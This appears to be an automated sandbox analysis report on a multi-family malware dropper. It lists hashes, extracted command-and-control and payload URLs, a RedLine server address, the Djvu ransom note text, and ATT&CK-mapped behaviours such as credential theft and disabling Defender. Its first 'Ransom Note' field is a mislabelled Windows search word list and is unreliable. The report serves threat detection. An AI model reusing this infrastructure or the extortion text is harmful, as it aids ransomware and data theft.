djvu | 75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94

Analysis

max time kernel
152s
max time network
172s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 22:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe
Size

8.6MB
MD5

2cb339f681efa535bb5bc251c667692e
SHA1

ed4ec4d1ea36540e1f67319646298bee7d9d4e50
SHA256

75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94
SHA512

fdf50f33e4d78484ee5ea71c34853973a9d01c849c7f54ed5104a8c6486392e3a3fae174eb2907246a8cc88a8fffea7bc2a5eef68ad0b81d79ffbea29c850f48

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\MicrosoftPaks\Files\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4ebf61c9-c489-4749-8bd7-539d318db8e7}\0.0.filtertrie.intermediate.txt

Ransom Note

0 0 ~ zoom~ zooming when you pinch with two fingers on the touchpad~ zoom mode~ zoom level~ zoom lens size~ zoom lens settings~ zoom in~ zoom increment~ zoom in:wux:zoom in~ zoom behavior~ zoom amount~ zone~ zones~ zone automatically~ ypdate~ your work or school~ your work or school domain~ your work or school cloud domain~ your windows mixed reality headset goes to sleep~ your wheel~ your voice~ your voice to improve speech services~ your voice to control your pc~ your videos library~ your update history~ your touchpad~ your touchpad to its default settings~ your timeline~ your sound output device~ your sound input device~ your settings~ your restart~ your recovery key~ your quick actions~ your profile~ your product id~ your picture~ your pictures library~ your phone~ your phone to timeline~ your personalization settings~ your pen's pressure sensitivity~ your pen shortcuts~ your pen settings~ your pc~ your pc recognizes your handwriting~ your pc name~ your pc and help you, or offer to help someone else~ your password~ your passwords on this pc~ your organization to manage your pc~ your offline files~ your notifications~ your network properties~ your network adapter~ your mouse~ your mouse to the end of the taskbar~ your mouse settings~ your microphone~ your lock screen background~ your language list~ your language and keyboard settings~ your info~ your homepage~ your hololens~ your headset sleeps~ your handwriting~ your fingertip~ your files with file history~ your eye tracker~ your email~ your drives~ your documents library~ your diagnostic data~ your device~ your device to your work or school domain~ your device to your work or school cloud domain~ your device password-less~ your device history~ your device from your work or school~ your device easier to hear~ your desktop background~ your country or region~ your cortana devices~ your contacts~ your computer~ your computer's status and resolve issues~ your computer's power settings~ your computer's memory problems~ your computer name~ your computer is on~ your cellular data connection with other devices~ your camera~ your call history~ your calendar~ your button flows as quick actions~ your braille display~ your advertising id~ your account~ your account picture~ your account info~ your accent color~ you, or offer to help someone else~ you use windows~ you use three finger taps on the touchpad~ you use the touchpad~ you use the mouse~ you use four finger taps on the touchpad~ you type~ you touch the screen~ you to enter tablet mode~ you tap with two fingers on the touchpad~ you store offline maps~ you speak with your device~ you sign in~ you send to microsoft~ you scroll with the mouse wheel~ you pinch with two fingers on the touchpad~ you open links~ you move your mouse to the end of the taskbar~ you have a 32-bit or 64-bit version of windows~ you drag with two fingers on the touchpad~ you drag three fingers on the touchpad~ you drag four fingers on the touchpad~ you double-tap the spacebar~ you double-tap shift~ you choose a text suggestion~ you can always say "hey cortana"~ you are right or left handed~ xdevice settings~ xbox performance~ xbox one settings~ xbox one controller settings~ xbox networking~ xbox networking settings~ xbox multiplayer settings~ xbox live~ xbox game bar~ x-device settings~ x menu~ wwin~ wwindows~ wwan~ wupdate~ wupdater~ wudo~ wuapp~ wsr~ writing~ write~ write in the handwriting panel with your fingertip~ workspace~ workspace when i remove my pen from storage~ workspace settings~ workplace settings~ workplace policies~ workplace network~ workplace access~ workgroup this computer is on~ workgroup name~ workflow~ work users~ work settings~ work remotely~ work or school~ work or school users~ work or school domain~ work or school cloud domain~ work network~ work hours~ work folders~ work email~ work account~ words~ words as you type~ words as i type~ word echo~ wondows~ wndows~ wndows update~ wlan~ wlan settings~ without sound~ without signing~ with your network adapter~ with your fingertip~ with your device~ with your computer~ with your computer's power settings~ with windows update~ with windows store apps~ with windows search~ with windows powershell in the win + x menu~ with windows mixed reality~ with windows firewall~ with two fingers on the touchpad~ with the touch keyboard~ with the screen when using the mouse~ with the mouse wheel~ with speech~ with shared folders~ with recording sound~ with quickstart~ with printing~ with playing sound~ with playing movies, tv shows, or videos~ with other devices~ with narrator~ with file history~ with directaccess~ with bluetooth devices~ with background downloads~ wireless~ wireless:wux:wireless~ wireless settings~ wireless display~ wireless display settings~ wireless devices on or off~ wireless controller settings~ wireless adapter problems~ wireless adapter issues~ wipe:wux:wipe~ winupdate~ winsows~ winows~ winows update~ winodws~ winodws update~ winf~ windws~ windws update~ windwos update~ windpws~ window~ windowupdate~ windows~ windowsupdate~ windowsupdates~ windows y~ windows x~ windows when i hover over them~ windows welcome notifications~ windows vpn~ windows version~ windows version:wux:windows version~ windows ups~ windows upo~ windows upgrade~ windows updte~ windows updatw~ windows updats~ windows updatre~ windows update~ windows updates~ windows updates:wux:windows updates~ windows updater~ windows updater:wux:windows updater~ windows updated~ windows update troubleshooter~ windows update settings~ windows update settings:wux:windows update settings~ windows update restart settings~ windows update problems~ windows update policies~ windows update options~ windows update not working~ windows update issues~ windows update history~ windows update delivery settings~ windows update delivery optimization~ windows update broken~ windows updare~ windows updae~ windows updaet~ windows upate~ windows upadte~ windows uop~ windows uodate~ windows uip~ windows udpate~ windows udate~ windows u[~ windows track app launches to improve start and search results~ windows to the sides or corners of the screen~ windows to go startup options~ windows to fill available space~ windows system:wux:windows system~ windows sync activities from this pc to the cloud~ windows suggest ease of access settings~ windows subscription~ windows store apps~ windows spotlight~ windows speech recognition~ windows specifications~ windows sonic~ windows show on the taskbar when using virtual desktops~ windows settings~ windows security settings~ windows search~ windows searches~ windows search:wux:windows search~ windows search settings~ windows s mode settings~ windows restore:wux:windows restore~ windows repair:wux:windows repair~ windows recovery:wux:windows recovery~ windows privacy~ windows powershell in the win + x menu~ windows permissions~ windows pdate~ windows password~ windows online personalization gallery~ windows on taskbar on secondary displays~ windows on taskbar on primary display~ windows mr settings~ windows mobility center~ windows mixed reality~ windows mixed reality settings~ windows mixed reality headset goes to sleep~ windows mixed reality audio settings~ windows manage my default printer~ windows logo key + c~ windows license~ windows is activated~ windows insider settings~ windows insider program settings~ windows ink workspace settings~ windows ink settings~ windows information:wux:windows information~ windows indexer~ windows hello~ windows hello:wux:windows hello~ windows hello setup~ windows hello settings~ windows hello pin~ windows hello fingerprint~ windows hello face~ windows hd color settings~ windows firewall~ windows firewall with advanced security~ windows firewall troubleshooter~ windows fire wall~ windows feedback frequency~ windows features on or off~ windows features appear in~ windows edition~ windows display language~ windows disk management~ windows diagnostics~ windows device manager~ windows defender~ windows defender firewall~ windows credentials~ windows credential manager~ windows collect activities from this pc~ windows cant hear me~ windows can't hear me~ windows backup:wux:windows backup~ windows background images~ windows anywhere settings~ windows animation~ windows and tabs appear when pressing alt+tab~ windows activation~ windows activation settings~ windows activate~ windows 8~ windows 8.1~ windows 7~ windows 64~ windows 32~ windows 10 update~ windows 10 updates:wux:windows 10 updates~ windows 10 restarts~ windows + x~ windown~ windowing~ windowes~ windowa update~ window, show what i can snap next to it~ window, resize any adjacent snapped window~ window version:wux:window version~ window update~ window updates~ window transparency~ window sup~ window supdate~ window layout~ window firewall~ window fill~ window features~ window de~ window color~ window arrangement~ windos update~ windoq~ windopws~ windoiws~ windoews~ windoes~ windoes update~ windiws~ windd~ winddows~ wind up~ win-x~ win-v~ win-c~ win+x~ win+v~ win+g~ win+c~ win x~ win update~ win updates~ win plus x~ win plus c~ win c~ win - x~ win - v~ win - c~ win + x menu~ win + v~ win + c~ wimd~ wimdows~ wiin~ wiindows~ wifi~ wifi settings~ width~ widows update~ widnows update~ wider cursor~ wider caret~ wide cursor~ wide caret~ wi-fi~ wi-fi:wux:wi-fi~ wi-fi settings~ wi-fi networks~ wi fi~ why an action can't be performed~ white theme~ white pointer~ white mouse pointer~ white mouse cursor~ white cursor~ while roaming~ while focus assist was on~ which workgroup this computer is on~ which icons appear on the taskbar~ which folders appear on start~ which files and folders are indexed~ which domain your computer is on~ which apps show notifications~ which apps should not be included in sets~ which apps can run in the background~ which apps can make phone calls~ which apps can control radios~ which apps can access your videos library~ which apps can access your pictures library~ which apps can access your notifications~ which apps can access your microphone~ which apps can access your eye tracker~ which apps can access your email~ which apps can access your documents library~ which apps can access your contacts~ which apps can access your camera~ which apps can access your call history~ which apps can access your calendar~ which apps can access your account info~ which apps can access diagnostic information~ which accounts appear in your timeline~ whether you are right or left handed~ whether to have a touchpad delay~ whether to enter tablet mode when you sign in~ whether the system asks you to enter tablet mode~ where you store offline maps~ where to install apps from~ where is the product key~ when your windows mixed reality headset goes to sleep~ when your headset sleeps~ when you use three finger taps on the touchpad~ when you use the touchpad~ when you use the mouse~ when you use four finger taps on the touchpad~ when you touch the screen~ when you tap with two fingers on the touchpad~ when you sign in~ when you pinch with two fingers on the touchpad~ when you move your mouse to the end of the taskbar~ when you drag with two fingers on the touchpad~ when you drag three fingers on the touchpad~ when you drag four fingers on the touchpad~ when you double-tap the spacebar~ when you double-tap shift~ when you choose a text suggestion~ when using virtual desktops~ when using the touchpad~ when using the mouse~ when using repeat keys~ when using captures~ when typing~ when two keys are pressed at the same time~ when turning on sticky, toggle, or filter keys~ when to turn off the screen~ when to turn off the screen when plugged in~ when to turn off the screen on battery power~ when the sticky keys modifier key is pressed~ when the screen is turned off~ when the pc sleeps~ when the pc sleeps when plugged in~ when the pc sleeps on battery power~ when pressing caps lock, num lock, or scroll lock~ when pressing alt+tab~ when possible~ when plugged in~ when pcs try to connect to my mobile device using usb~ when on battery~ when num lock is on~ when navigating~ when narrator is speaking~ when narrator is on~ when my device is locked~ when lighting changes~ when launching an app from another app~ when keys are pressed~ when i’m using my pen~ when it’s available~ when it's pressed twice in a row~ when it's moving~ when i turn on narrator~ when i snap a window, show what i can snap next to it~ when i resize a snapped window, resize any adjacent snapped window~ when i remove my pen from storage~ when i record~ when i record a game~ when i hover over them~ when enabling sticky keys, toggle keys, or filter keys~ when duplicating screen~ when closing tabs~ when apps access my location~ when a mouse is connected~ wheel~ wheels~ wheel vibration settings~ wheel vibrate~ wheel settings~ wheel haptics settings~ wheel defaults~ wheel default settings~ whats new~ what's new~ what windows show on the taskbar when using virtual desktops~ what windows and tabs appear when pressing alt+tab~ what version of windows do i have:wux:what version of windows do i have~ what is my computer name:wux:what is my computer name~ what i missed while focus assist was on~ what i can snap next to it~ what happens when you use three finger taps on the touchpad~ what happens when you use four finger taps on the touchpad~ what happens when you drag three fingers on the touchpad~ what happens when you drag four fingers on the touchpad~ what cortana can do, see, and use~ what closing the lid does~ what appears when pressing alt+tab~ what appears when launching an app from another app~ wfi~ well your pc recognizes your handwriting~ welcome screen~ welcome screen settings~ welcome notifications~ website~ websites~ websites can use your language list~ website apps~ weblinks~ webcame~ webcam:wux:webcam~ webcam settings~ webcam privacy~ webcam permissions~ web to app link~ web to app linking~ web pages are displayed in tabs~ web links~ web language~ web languages~ web credentials~ web content control~ web cam:wux:web cam~ web browser~ web browsers~ web browser settings~ web apps~ ways i can set up my device to get the most out of windows~ way measurements are displayed~ way currency is displayed~ was on~ warn~ warning~ warnings~ wallpaper~ wallpaper sync~ wallpaper settings~ wait for second keystroke~ wait for repeated keystrokes~ wait for new keystrokes~ wait for keystrokes~ wait for different keystrokes~ wait before accepting keystrokes~ w up~ vpnm~ vpn while roaming~ vpn settings~ vpn over metered networks~ vpn options~ vpn connection~ vpn advanced settings~ vpn advanced options~ vpmn~ volume~ volume settings~ volume of other apps when narrator is speaking~ volume mixer~ volume mixer:wux:volume mixer~ volume level~ volume control~ voice~ voices~ voiceover~ voice volume~ voice tone~ voice to improve speech services~ voice to control your pc~ voice timbre~ voice timber~ voice speed~ voice settings~ voice rate~ voice quality~ voice pitch~ voice for apps~ voice emphasize formatted text~ voice dictation~ voice data~ voice control~ voice agents~ voice agent settings~ voice activation settings~ voice activation privacy settings~ voice activation permissions~ vlue~ vivid~ visual~ visuals~ visual quality of windows mixed reality~ visual feedback when you touch the screen~ visual feedback touch settings~ visual feedback pen settings~ visual feedback on or off~ visual display~ visual cursor for narrator~ visual alerts for audio notifications~ visual alert for audio notifications~ vision~ vision settings~ visible alerts~ virus~ virtual private networks~ virtual private network settings~ virtual desktop~ virtual desktops~ virtual desktop settings~ view~ viewer

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

tofsee

patmushta.info

ovicrush.cn

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4392-281-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4392-283-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4392-287-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4392-290-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1744-172-0x0000000001580000-0x0000000001EA6000-memory.dmp	family_glupteba
behavioral2/memory/1744-173-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/4372-179-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/3872-183-0x0000000001B00000-0x0000000002426000-memory.dmp	family_glupteba
behavioral2/memory/3872-184-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 4128 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	4128	rUNdlL32.eXe

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2072-213-0x0000000000300000-0x0000000000474000-memory.dmp	family_redline
behavioral2/memory/2072-238-0x0000000000300000-0x0000000000474000-memory.dmp	family_redline
behavioral2/memory/868-260-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2072-274-0x0000000000300000-0x0000000000474000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 1576 created 1744 1576 svchost.exe Info.exe
PID 1576 created 3872 1576 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 1576 created 1744	1576	svchost.exe	Info.exe
PID 1576 created 3872	1576	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4304-252-0x00000000005D0000-0x0000000000614000-memory.dmp	family_onlylogger
behavioral2/memory/4304-253-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

238 3048 rundll32.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
238	3048	rundll32.exe

Executes dropped EXE 49 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exejfiag3g_gg.exeInstall.exeFolder.exeInfo.exeInstallation.exeFolder.exepub2.exemysetold.exemd9_1sjm.exeComplete.exeInfo.execsrss.exe8jmbQb_rh3t2mrKFZwTwUGlq.exelDdS1WMJPF4UAl19nBGTj0mP.exeeui4rr46HDk2ShlpjL9iJ6bo.exeeBNdby7_U4k6msKv3eTB5mye.exeJeysQhYz31CQLdtBWLpMqzAz.exe6rKQ4fBrbWatMcjKw2Rii9H2.exeqhKDniWI2KmSmu8DUSRryMd9.exe9o6imfdYedGqn3wjzwGuuvez.exe2dMnD2VbczUZ6UZsrLHzJUre.exeL84ksia5G66Ptl7obzFS__8v.exeaxzyo4HCwZKUGcUxPBCfRQjA.exe1fyR0Sd2aV3i3akI5rq0PZFv.exeWerFault.exexAyGsfpDFb33zy_PxKbzrrni.exe0BsqeDtyBSSUybevCqcCZH0Z.exeeldGKg6AxnrodbfQsspOYUf2.exel36_kCSX2CHi4f6qqS_AsMJ3.exe7bNjlyoO2Feob3nuVN4b8BCU.exeH0n6Q_XzF3J2qEuqprygBUIR.exenHagp71zKaF7ccqraFqNDB4X.exeenY7JHymAIDHHxOPFWIqVZOx.exeInstall.exeInstall.exeL84ksia5G66Ptl7obzFS__8v.exeb9cac397-d7eb-428c-b4ed-62df56e0e335.exeinjector.exeRegwNqdmAe1tMYalmbSWfkjV.exedada.exebuild.exexjslbbfw.exeAccostarmi.exe.pifDmeRXPZ.exeMoUSO.exeqhKDniWI2KmSmu8DUSRryMd9.exe

pid	process
2772	Files.exe
3752	KRSetp.exe
4272	jfiag3g_gg.exe
1708	jfiag3g_gg.exe
4020	Install.exe
4372	Folder.exe
1744	Info.exe
2472	Installation.exe
3196	Folder.exe
3960	pub2.exe
216	mysetold.exe
3172	md9_1sjm.exe
4144	Complete.exe
4372	Info.exe
3872	csrss.exe
4812	8jmbQb_rh3t2mrKFZwTwUGlq.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
2072	eBNdby7_U4k6msKv3eTB5mye.exe
3956	JeysQhYz31CQLdtBWLpMqzAz.exe
4816	6rKQ4fBrbWatMcjKw2Rii9H2.exe
1420	qhKDniWI2KmSmu8DUSRryMd9.exe
220	9o6imfdYedGqn3wjzwGuuvez.exe
4692	2dMnD2VbczUZ6UZsrLHzJUre.exe
4088	L84ksia5G66Ptl7obzFS__8v.exe
1824	axzyo4HCwZKUGcUxPBCfRQjA.exe
4200	1fyR0Sd2aV3i3akI5rq0PZFv.exe
3896	WerFault.exe
1204	xAyGsfpDFb33zy_PxKbzrrni.exe
4768	0BsqeDtyBSSUybevCqcCZH0Z.exe
3596	eldGKg6AxnrodbfQsspOYUf2.exe
3148	l36_kCSX2CHi4f6qqS_AsMJ3.exe
1984	7bNjlyoO2Feob3nuVN4b8BCU.exe
4304	H0n6Q_XzF3J2qEuqprygBUIR.exe
1508	nHagp71zKaF7ccqraFqNDB4X.exe
4236	enY7JHymAIDHHxOPFWIqVZOx.exe
4636	Install.exe
3796	Install.exe
4392	L84ksia5G66Ptl7obzFS__8v.exe
4380	b9cac397-d7eb-428c-b4ed-62df56e0e335.exe
2440	injector.exe
2000	RegwNqdmAe1tMYalmbSWfkjV.exe
3420	dada.exe
4976	build.exe
4268	xjslbbfw.exe
2284	Accostarmi.exe.pif
400	DmeRXPZ.exe
4204	MoUSO.exe
4608	qhKDniWI2KmSmu8DUSRryMd9.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/3172-165-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

JeysQhYz31CQLdtBWLpMqzAz.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JeysQhYz31CQLdtBWLpMqzAz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JeysQhYz31CQLdtBWLpMqzAz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0BsqeDtyBSSUybevCqcCZH0Z.exe8jmbQb_rh3t2mrKFZwTwUGlq.exeInstall.exe1fyR0Sd2aV3i3akI5rq0PZFv.exel36_kCSX2CHi4f6qqS_AsMJ3.exeInstallation.exebuild.exeH0n6Q_XzF3J2qEuqprygBUIR.exe75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	0BsqeDtyBSSUybevCqcCZH0Z.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	8jmbQb_rh3t2mrKFZwTwUGlq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	1fyR0Sd2aV3i3akI5rq0PZFv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	l36_kCSX2CHi4f6qqS_AsMJ3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Installation.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	H0n6Q_XzF3J2qEuqprygBUIR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe

Loads dropped DLL 33 IoCs

Processes:

rundll32.exelDdS1WMJPF4UAl19nBGTj0mP.exeeui4rr46HDk2ShlpjL9iJ6bo.exe0BsqeDtyBSSUybevCqcCZH0Z.exedada.exe

pid	process
3224	rundll32.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
4768	0BsqeDtyBSSUybevCqcCZH0Z.exe
4768	0BsqeDtyBSSUybevCqcCZH0Z.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe
3420	dada.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HiddenSound = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\6rKQ4fBrbWatMcjKw2Rii9H2.exe"

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

md9_1sjm.exeJeysQhYz31CQLdtBWLpMqzAz.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JeysQhYz31CQLdtBWLpMqzAz.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

217 ipinfo.io
247 ipinfo.io
13 ip-api.com
26 ipinfo.io
27 ipinfo.io
195 ipinfo.io
196 ipinfo.io
199 ipinfo.io
246 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
217	ipinfo.io
247	ipinfo.io
13	ip-api.com
26	ipinfo.io
27	ipinfo.io
195	ipinfo.io
196	ipinfo.io
199	ipinfo.io
246	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

